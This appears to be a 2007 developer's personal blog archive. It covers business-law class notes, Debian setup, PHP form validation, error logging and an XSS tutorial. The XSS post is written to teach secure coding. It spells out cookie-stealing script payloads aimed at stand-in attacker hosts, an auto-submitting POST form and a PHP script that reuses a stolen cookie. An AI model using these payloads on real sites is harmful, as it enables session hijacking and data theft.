Sunday, December 09, 2007

Organizations Behaviour 09th dec 2007 class

it was a pleasure to start my BCS classes again after facing a lot of personal problems for 2+ weeks. as usual i was late for my first class because the registration process took a little bit more time than i expected. today's classes were held by Dr. Dayan. even though i didn't know him before, it was a pleasure to have such a lecturer to cover the topic of Professional Issues in Information Systems Practice.

i have missed the first part of the syllabus, which is named professional institutions. so i have to work hard and study for that part; as these are all theoretical, it will be harder to understand these points if i don't study them now.

today the class started with the topic of ORGANIZATIONS. this was quite interesting to me as i've covered many of the topics in CIMA business law subject.

organizations can be defined as a group of people working together to achieve a common goal. there are two main types of organizations:
  1. Commercial (these organizations do business with a profit motive, most of the time selling products and services)
  2. Non-commercial (these are typically motivated by social and economic value; there are many examples of this type of organization)

in order to start a new commercial organization in the UK you have to follow the Companies Act 1985, and in Sri Lanka you have to follow the New Companies Act 2007. but for non-commercial organizations in the UK the approval process is still handled by the Queen as a tradition. that Royal Charter status will not be given to non-commercial organizations unless they prove their commitment beyond reasonable doubt to the approving council (the Privy Council).

under the UK Companies Act there are 3 types of companies that you can start.

  1. Sole Proprietor
  2. Partnerships
  3. Registered Companies

Sole Proprietor
there are not many formal documents or formal procedures involved in starting a sole proprietor business. but there is no separate legal existence for this type of business, so the owner is personally liable for all its liabilities.

Partnerships
Partnerships are those where a couple of people start working in a group to achieve a common goal. the arrangement for this can be written or verbal. the problem with partnerships is that all contracts should be signed by all of the members of the partnership, and every member is unlimitedly liable for that partnership. almost all commercial partnerships among people fail because sharing revenues always becomes a critical factor. but professional partnerships such as those of lawyers and GPs are likely to be successful, as there is no sharing of investment or revenue in them; it is all about sharing their client base with the members of the partnership. the number of members of a partnership must be 2-20, and when the ownership changes the law will treat it as a new partnership, so all those important documents have to be revised again. every member of a partnership has management powers and the power to act as an agent of that partnership.

Registered Companies (limited liability)
with this type of organization we can give a separate legal existence to the company we are starting. so in that case the liability rests on the company itself, not on its owners and management. the maximum liability of a given shareholder for that particular company is the money he/she has invested in that company. there are two types of companies which can be formed under registered companies.

  1. Private Limited Companies (PVT)
  2. Public Limited Companies (PLC)

Private Limited Companies
in this formation there has to be a minimum of 2 and a maximum of 50 shareholders, and the ownership is decided by the number of equal shares they own. but there are some restrictions placed on private companies by their constitution.

  1. private companies cannot offer shares or debentures to the public.
  2. when the ownership of shares changes, it must first be approved by the board of directors.
  3. the maximum number of shareholders cannot exceed 50.

Public Limited Companies
public limited companies don't have those three restrictions which apply to private limited companies, but in a public limited company there must be a minimum of 7 shareholders.

the limit of a shareholder's liability towards company debts is controlled in three ways.

  1. limited by shares (a shareholder's liability is limited to the amount they have invested)
  2. limited by guarantee (members agree to pay a small equal amount in case the company is wound up)
  3. unlimited (every shareholder is personally liable for all company debts)

Wednesday, October 10, 2007

Peoplesnet V1.0 Released

At last we managed to get peoplesnet version 1 deployed on the production server after doing 5 Quality Assurance cycles. now we are awaiting the next theme from the client, and once we re-theme it, it will go live. :)

Features it contains include:
1. Profiles
2. Inviting Friends
3. Photo Galleries
4. Video Galleries
5. Blogs
6. RSS Feeds
7. Private Messaging
8. Address Book
9. Classifieds
10. Events
11. Forums
12. Jobs
13. Dynamic Networks
14. Content Sharing
15. Content view definable Public / Networks
16. Admin Controlled Advertisement system

Some screenshots (images not included): Home Page, Recent Video, My Network Graphic, Movable Task Window, Classified Listing

Thursday, August 09, 2007

How to estimate the cost of a web development project

for web development i think you should go with a fixed price for the time period. once you get the time estimate from the project manager, make sure your developers / designers don't take more time than expected to finish a job. because this field is so competitive, you have to deliver projects on time to keep up in the business. a good process should be defined to gather client requirements and the project spec, and you have to make sure not to accept any change requests from the customer until you finish the first release.

and at the same time you have to make sure that you have a sound Quality Assurance process to make sure that the deliverables are exact to the client requirements.

Thursday, June 14, 2007

filter.php

This is my newest solution for form submit data validation. it was developed from a "developer's point of view" rather than an "end user's point of view". so if you don't have any idea about php development then you'll find it a bit difficult to understand. but once you get to know the pattern you'll love it, and of course you'll be using it to validate all your form submissions.

first let's see what kinds of HTML form elements we have to validate.
  • textfield
  • textarea
  • checkbox
  • radio button
  • radio group
  • List / Menu
  • file field
and with respect to all these fields, what we should thoroughly take care of is not letting users submit any values containing <SCRIPT> tags, <STYLE> tags or any other undefined strings.

and one other cool feature of this script is that you can keep the default values of the other elements even though one element fails to validate. it may sound like a very common and lazy task with javascript-enabled pages, but remember this snippet will validate and keep the default values nicely even without any javascript at all.

does that sound interesting?
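An added example of the pattern described above, not the author's filter.php: each field in the list (text fields, a menu, a radio group, a checkbox) is checked against a whitelist rule, and the form is redrawn with the accepted values kept when one field fails, with no javascript involved. The field names, rules and sample submission are assumptions constructed for the example.

```php
<?php
// Added example (not the author's filter.php): validate a submitted form
// against per-field whitelist rules and redraw it with the accepted values
// kept, without any javascript. Field names and rules are assumptions.

// Form definition: field name => [element type, rule, default value].
// A string rule is a regex for free text; an array rule lists the only
// values a menu, radio group or checkbox is allowed to send.
$fields = [
    'name'    => ['textfield', '/^[\p{L} .\'-]{1,60}$/u', ''],
    'age'     => ['textfield', '/^\d{1,3}$/',             ''],
    'country' => ['menu',      ['lk', 'uk', 'in'],        'lk'],
    'gender'  => ['radio',     ['m', 'f'],                ''],
    'terms'   => ['checkbox',  ['1'],                     ''],
];

// Check one value; returns an error message or null when it is acceptable.
function validateField(string $name, array $spec, ?string $value): ?string {
    [$type, $rule] = $spec;
    if ($value === null || $value === '') {
        return $type === 'checkbox' ? null : "$name is required"; // unchecked boxes are not sent
    }
    if (is_string($rule)) {
        // The character whitelist excludes '<' and '>', so <script> and
        // <style> tags (or any other markup) can never get through.
        return preg_match($rule, $value) === 1 ? null : "$name contains invalid characters";
    }
    return in_array($value, $rule, true) ? null : "$name has an unexpected value";
}

// Validate the whole submission. Returns [errors, values]: values carries the
// accepted input for each field (or its default when rejected/absent), so the
// form can be redrawn with the user's other entries intact.
function validateForm(array $fields, array $post): array {
    $errors = [];
    $values = [];
    foreach ($fields as $name => $spec) {
        // Arrays sent as field[]=x are not strings and are treated as absent.
        $raw = isset($post[$name]) && is_string($post[$name]) ? $post[$name] : null;
        $err = validateField($name, $spec, $raw);
        if ($err !== null) {
            $errors[$name] = $err;
        }
        $values[$name] = ($err === null && $raw !== null) ? $raw : $spec[2];
    }
    return [$errors, $values];
}

// Escape anything written back into the HTML so a kept value is shown, not interpreted.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample submission: 'name' carries a script tag and is rejected,
// while every other field keeps its submitted value on the redrawn form.
[$errors, $values] = validateForm($fields, ['name' => '<script>alert(1)</script>',
    'age' => '29', 'country' => 'uk', 'gender' => 'm', 'terms' => '1']);
foreach ($errors as $msg) {
    echo "error: $msg\n";
}
echo '<input type="text" name="age" value="' . e($values['age']) . '">' . "\n";
echo '<option value="uk"' . ($values['country'] === 'uk' ? ' selected' : '') . '>UK</option>' . "\n";
echo '<input type="checkbox" name="terms" value="1"' . ($values['terms'] === '1' ? ' checked' : '') . ">\n";
```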

Monday, June 11, 2007

The Big Day Coming ahead on friday

ya, it will be a big day for me because on friday i have to conduct my first technical session for all my colleagues at accura-tech. even though they have given me the title of software engineer, i'm currently educating all the other developers about new technologies.

so by friday evening i should prepare myself to conduct this technical session on user input validation. hopefully this will be the first in a row of sessions on web security, which is one of my favourite topics.

i have already designed and checked the validation code which i will be using to demonstrate the impact.

i'll update this blog with a photo (if available) and the necessary files once i'm done with this.

and i know that surely there will be a lot of ideas coming in from our developers too, so i'll try to post them back to the blog.

--
Praveen Gunasekara

Wednesday, May 30, 2007

vote for drupal

Drupal has been selected as a finalist by the editors at CNet Webware in the first ever “Webware 100” Awards, from over 4,000 user-submitted nominations. Winners will be announced on Monday, June 18 and posted on Webware.com.

Voting is NOW OPEN, and will remain so until June 11. So please, vote for Drupal!

Vote for Drupal in the CNet Webware 100 Awards!

Monday, May 14, 2007

installing bluetooth manager on my debian laptop

i just wanted to install some kind of bluetooth connection manager on my laptop, because i had some files to be transferred from my mobile to the laptop. my laptop is a compaq presario m2000 and i'm using debian (my favourite OS) on it.

first i installed the bluez-utils package.

apt-get install bluez-utils

then i connected the bluetooth dongle and ran hciconfig.

hci0: Type: USB
BD Address: 00:11:67:1D:ED:DC ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING PSCAN
RX bytes:4816991 acl:18400 sco:0 events:7524 errors:0
TX bytes:657600 acl:7361 sco:0 commands:71 errors:0


so with the previous result i knew that the dongle was recognized, and then i wanted to scan for new devices. then i turned on bluetooth on my mobile phone (Sony Ericsson k750i).

then i executed hcitool scan and it gave me the following result.

praveen-laptop:/home/praveen/Desktop/Downloads# hcitool scan
Scanning ...
00:18:13:4F:4A:61 Praveen K750i
00:03:7A:E0:9B:EE CHANDIKA
00:17:4B:D4:29:56 Chandika Nokia 6630


now it seems that i can connect to the phone. so i wanted to know some more information about my mobile, so i ran hcitool information 00:18:13:4F:4A:61 and it gave me the following result.

Requesting information ...
BD Address: 00:18:13:4F:4A:61
Device Name: Praveen K750i
LMP Version: 1.2 (0x2) LMP Subversion: 0x41c
Manufacturer: Philips Semiconductors (37)
Features: 0xff 0xed 0x8d 0xf8 0x1a 0x08 0x00 0x00
<3-slot> <5-slot> ....


then i installed the gnome-bluetooth debian package. i selected tuxfamily.org to download it from, so i had to update the sources.list which resides at /etc/apt/sources.list.

deb http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth
deb-src http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth


i added the two lines above. then i tried to update apt, but it seems that you need a public key to access the newly added sources.

so then i ran

wget http://download.tuxfamily.org/osrdebian/61B8DB62.gpg -O- | sudo apt-key add -

to add the key to the apt trusted key list.

the hard work is over, it seems. then i ran apt-get install gnome-bluetooth in order to install gnome-bluetooth.

when the install completed there was a new button appearing under

applications ->accessories -> bluetooth file sharing.

when i clicked on it, the service started, and then i tried to send an image file to the laptop from my mobile and it worked.

wooow, at last.

but to send files from my laptop to the mobile i still have to use the command gnome-obex-send, which opens a new window asking which device i want to send the file to.

that's well done.

i'm catching up and living with linux.

Monday, April 23, 2007

XSS Attack

Cross site scripting (XSS) is a relatively common problem in web application security, but it is extremely dangerous. Rather than attacking the server directly, the attacker uses a vulnerable web page to attack one of its users. This makes tracking attackers extremely difficult when requests are not fully logged. Let's go deep and find out how a vulnerable web page leads to an XSS attack, and how to make sure there is no room left for XSS attacks in the web sites we develop.

So let's see how an XSS attack works. XSS attacks are the result of flaws in server side web applications (that's what we do...) and are rooted in user inputs which are not properly validated. For example, think about a PHP page named hello.php which is used to echo a parameter sent to that file.

If you simply pass

hello.php?name=Praveen Gunasekara

Then the page will give you the expected result of printing the name. but guess what will happen if we send HTML tags in that request. For example:

hello.php?name=<ul><li>Praveen</li><li>Gunasekara</li></ul>

the input is not validated by the script before it is rendered by the victim's web browser. And think about situations where we save the un-validated parameters into a database or a binary file and retrieve them later to be rendered on the page.

for the moment you might be wondering, so what is the risk involved? think: if the attacker can pass HTML tags, it means he can easily pass <script> tags. then let's discuss how the attack works. as we all know, we only submit data either by the GET or the POST method. attacking through the GET method is the easiest and at the same time the noisiest, because almost every web server logs all its URI requests.

so the simplest thing an attacker can do with javascript is to change the location of the window.

hello.php?name=<script>document.location.replace('http://attack/spam')</script>

but by the nature of XSS attacks the attacker himself cannot directly do any harm to other users. all he can do is wait until someone else connects to that page. so when someone else clicks through to this page, he will be automatically redirected to some other page.

and now think about hijacking the user's whole session with this kind of attack. it's not as hard as it sounds. all the attacker has to do is change the href of a particular link.

hello.php?name=<script>document.location.replace('http://attack/spam?c='%2Bdocument.cookie)</script>

so now you might say that the POST method is far safer because the end user cannot see the parameters we are passing to the script.

you are wrong. it is a bit harder to attack the POST method, because to do that you need an intermediate web page with parameters identical to the form on the original page. for example,

<form name=f method=POST action="http://host/hello.php">
<input type=hidden name="name" value="<script>document.location.replace('http://attacker/payload?c='+document.cookie)</script>">
</form>
<script>f.submit()</script>


and rather than redirecting with the code, he might decide to change the look and feel and layout of the web page that's being attacked. but once he redirects the page to his own page there are several harmful things that can be done. for example, the following code can log the visitor's IP, referrer and the sensitive information carried in the headers.

and once the attacker has the list of IPs and cookies, he can write an automated script to connect to the site with those session details and change the sensitive information there. the code below shows how to download the source code of a PHP file on the server.

<?php
$request = "GET /secret.php HTTP/1.0\r\n";
$request .= "Cookie: {$HTTP_GET_VARS['c']}\r\n";
$request .= "\r\n";
$s = fsockopen("host", 80, $errno, $errstr, 30);
fputs($s, $request);
$content = '';
while (!feof($s))
{
    $content .= fgets($s, 4096);
}
fclose($s);
echo $content;
?>


and the following example code shows how to overwrite a PHP file on the server.

so finally i hope every one of us has understood how dangerous XSS attacks can be and how much more securely we should write our web applications.
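As an added example (not code from the original post), here is the hello.php described above in its vulnerable form next to a hardened version, run over the post's own sample inputs; the function names and the session cookie settings are assumptions for illustration.

```php
<?php
// Added example (not from the original post): the hello.php the post
// describes, first in its vulnerable form and then hardened. Function
// names and the cookie settings below are assumptions for illustration.

// Vulnerable: the raw query parameter is written straight into the HTML,
// so hello.php?name=<script>...</script> runs in every visitor's browser.
function helloVulnerable(string $name): string {
    return "<p>Hello, $name</p>";
}

// Hardened: every character that could open a tag or break out of an
// attribute is encoded, so the same input is displayed as text, not executed.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function helloSafe(string $name): string {
    return '<p>Hello, ' . e($name) . '</p>';
}

// Session cookie flags that limit what a successful injection can reach:
// HttpOnly keeps the session id out of document.cookie, which is exactly
// what the cookie-stealing payload in the post reads. Call before session_start().
function hardenSessionCookie(): void {
    ini_set('session.cookie_httponly', '1');
    ini_set('session.use_only_cookies', '1');
    if (!empty($_SERVER['HTTPS'])) {
        ini_set('session.cookie_secure', '1');
    }
}

// Constructed sample requests, including the post's own payloads.
$samples = [
    'Praveen Gunasekara',
    '<ul><li>Praveen</li><li>Gunasekara</li></ul>',
    "<script>document.location.replace('http://attack/spam')</script>",
];
foreach ($samples as $name) {
    echo "vulnerable: " . helloVulnerable($name) . "\n";
    echo "hardened:   " . helloSafe($name) . "\n\n";
}
```

Output encoding at the point where data is written into the page is what stops the injected markup; input validation (as in the form validator post) narrows what reaches the application but is not a substitute for it.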

Praveen Gunasekara.

My technorati profile

so today i've signed up for a new account at technorati. this is the link to my profile page.

My Technorati Profile

let's see how this is going to help me out.

~Praveen Gunasekara

Friday, April 20, 2007

error handling system for web applications

managing web applications has never been so easy. external / internal errors occur all the time due to DB connection failures or some other 3rd party service connection failure, which are so hard to predict.

i have always been thinking about this issue. many experts suggest that we should e-mail the error with the relevant information to the sys administrator or someone who's responsible. but sometimes it is not so easy to do so, because most of the time the errors are reciprocal (meaning one error leads to another, and that leads to another, and the chain continues).

and by the way, most people now use RSS feeds to get to know what is happening all over the internet rather than searching and browsing the web.

so what i was thinking about is to log all the errors in a database table rather than a plain text file. to accomplish that in PHP you can simply use the function set_error_handler and from there define a function which inserts that specific error's details into the DB. after that we can have a separate PHP file which generates a dynamic RSS file containing the latest error messages on request, protected by some kind of authentication.

and from there onwards you can simply add that link to your favorite RSS reader, and then you will be informed about all the error messages which occurred within the application you delivered to the customer.

and if you wish to extend this error handling system, you can separate FATAL errors, WARNINGS and NOTICES, or use a custom classification of all the error messages.
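An added example of the design described above, not the author's code: a handler registered with set_error_handler writes each error to a database table, and a second function turns the newest rows into an RSS 2.0 feed behind a simple authentication check. It assumes the pdo_sqlite extension and uses an in-memory database so it runs stand-alone; the table, function and feed names are assumptions.

```php
<?php
// Added example (not the author's code): log PHP errors to a database
// table via set_error_handler and serve the newest ones as an RSS feed.
// Assumes the pdo_sqlite extension; an in-memory database is used here so
// the script runs stand-alone. Table, function and feed names are assumptions.

function errorStore(): PDO {
    static $db = null;
    if ($db === null) {
        $db = new PDO('sqlite::memory:');
        $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $db->exec('CREATE TABLE app_errors (id INTEGER PRIMARY KEY, level INTEGER,'
                . ' message TEXT, file TEXT, line INTEGER, occurred_at TEXT)');
    }
    return $db;
}

// Handler registered with set_error_handler: one row per error. A prepared
// statement keeps the (often user-influenced) message out of the SQL text.
function dbErrorHandler(int $errno, string $errstr, string $errfile, int $errline): bool {
    $stmt = errorStore()->prepare('INSERT INTO app_errors (level, message, file, line, occurred_at)'
                                . ' VALUES (?, ?, ?, ?, ?)');
    $stmt->execute([$errno, $errstr, $errfile, $errline, gmdate('c')]);
    return true; // handled; returning false would fall through to PHP's default handler
}

// The three categories the post mentions, derived from the error level.
function levelName(int $errno): string {
    if ($errno & (E_ERROR | E_USER_ERROR | E_RECOVERABLE_ERROR)) return 'FATAL';
    if ($errno & (E_WARNING | E_USER_WARNING)) return 'WARNING';
    return 'NOTICE';
}

// Build the RSS 2.0 document for the newest $limit rows. Every field is
// XML-escaped because error messages frequently echo user-supplied text.
function errorsAsRss(int $limit = 20): string {
    $rows = errorStore()->query('SELECT * FROM app_errors ORDER BY id DESC LIMIT ' . $limit)
                        ->fetchAll(PDO::FETCH_ASSOC);
    $x = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_XML1, 'UTF-8');
    $out = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<rss version=\"2.0\"><channel>\n"
         . "<title>Application errors</title><link>https://app.example/errors</link>"
         . "<description>Latest logged errors</description>\n";
    foreach ($rows as $r) {
        $out .= '<item><title>' . $x(levelName((int)$r['level']) . ': ' . $r['message']) . '</title>'
              . '<description>' . $x($r['file'] . ':' . $r['line']) . '</description>'
              . '<guid isPermaLink="false">error-' . (int)$r['id'] . '</guid>'
              . '<pubDate>' . gmdate(DATE_RSS, strtotime($r['occurred_at'])) . '</pubDate></item>' . "\n";
    }
    return $out . "</channel></rss>\n";
}

// Gate the feed with HTTP Basic auth so the error stream is not public.
// $expectedHash comes from password_hash(); hash_equals avoids a timing leak on the user name.
function feedAuthorized(?string $user, ?string $pass, string $expectedUser, string $expectedHash): bool {
    return $user !== null && $pass !== null
        && hash_equals($expectedUser, $user) && password_verify($pass, $expectedHash);
}

set_error_handler('dbErrorHandler');
trigger_error('DB connection failed', E_USER_WARNING);        // constructed sample errors
trigger_error('third-party service timed out', E_USER_NOTICE);
$hash = password_hash('feed-password', PASSWORD_DEFAULT);      // stored server-side in practice
echo feedAuthorized('ops', 'feed-password', 'ops', $hash) ? errorsAsRss() : "401 Unauthorized\n";
```

In a web deployment the user name and password would come from $_SERVER['PHP_AUTH_USER'] and $_SERVER['PHP_AUTH_PW'], and the response should be served with Content-Type: application/rss+xml.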

praveen gunasekara.
"technology reinvented"

Thursday, February 22, 2007

Desktop application Vs Web Application

is this the end of the desktop applications era?

you may ask why i said so. even though i'm a PHP developer, when it comes to large scale projects i always recommended building them as desktop applications. but now i've changed my mind. web applications were lacking one thing for sure: the ability to perform multiple tasks at once. but today this is totally different.

today i've downloaded eyeOS.
"eyeOS is an Open Source Web Desktop Environment, commonly known as Web Operating System (Web OS) or Web Office"

it was simply superb. the total size of the source files was just 1Mb. i extracted it to "/var/www", then opened a web browser and typed "localhost/eyeOS". there was a warning message saying that the ./etc/ folder needs 777 access level. so i changed the access level and refreshed the browser window. then it asked for the root password, and that was all.

this is eye candy. for sure.

eyeOS seems to be the most interesting web application i've ever used. with its endless opportunities i can't even imagine what the web is going to be.

installing applications is really simple. all you need to do is download the eyeOS application from the web and open the "eyeApps" application in the eyeOS menu. then click the "install apps" button placed at the top-left of that window, and just point it to the tar.gz file you've downloaded from the application library.

i'm going to install this on my server. then i'll have access to all my files in one place and the ability to manage all my files in one browser window.

Tuesday, February 13, 2007

setting up your notebook's wireless network connection

Today i was configuring a new test server for PHP5 at my office, and suddenly i noticed that even though i have a wifi-enabled laptop, it was not able to connect to the internet using it. i use two operating systems on my laptop, "Windows XP" and "Debian". most of the time i log in to the debian account, but whenever i'm in the office i plug the network cable into my laptop.

but due to what happened today i had to log in to the windows account, and from there i configured the wireless network. wow, surprisingly it connected to our office wireless network within minutes. so then i knew that there must be something which stopped me configuring it in my Linux account.

so once again i rebooted the notebook and logged in to the debian account, and there i tried to connect to the office wireless network. but i found that it is not working, and when i ran dmesg i found an error that looked similar to "bcm43xx: Error: Microcode "bcm43xx_microcode5.fw" not available or load failed."

for this error i installed bcm43xx-fwcutter, which was a contrib package. then i thought the problem was resolved, and i found the new network connection eth0 when i ran ifconfig.

but now when i execute "ifup eth0" it keeps saying "DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 13" and so on, and after six attempts it says "No DHCPOFFERS received. No working leases in persistent database - sleeping."

i've used a static IP in place of DHCP, but it didn't work either.

i've installed kismet-server, airsnort and linux-wlan-ng, and then i tried an airsnort scan. but it didn't work either.

i'm still looking for an answer to this. i'll update this topic as soon as i get the answer.